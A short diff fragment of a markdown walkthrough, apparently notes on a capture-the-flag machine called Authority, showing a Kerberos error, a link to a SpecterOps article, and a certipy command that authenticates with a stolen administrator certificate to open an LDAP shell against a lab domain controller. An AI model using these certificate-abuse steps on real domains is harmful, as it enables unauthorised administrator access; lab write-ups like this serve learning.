Paliak/PaliaksNotes/docs/Authority/index.md

 [-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
 ```

-Can't seem to get an admin TGT.
-Googling the error we can find [this](https://posts.specterops.io/certificates-and-pwnage-and-patches-oh-my-8ae0f4304c1d) page which mentions using another tool and ldap. `certipy` seems to have an option called ldap-shell, so let's try that.
+Can’t seem to get an admin TGT.
+Googling the error we can find [this](https://posts.specterops.io/certificates-and-pwnage-and-patches-oh-my-8ae0f4304c1d) page which mentions using another tool and ldap. `certipy` seems to have an option called ldap-shell, so let’s try that.

 ```bash
 $ certipy auth -pfx administrator_authority.pfx -dc-ip 10.10.11.222 -ldap-shell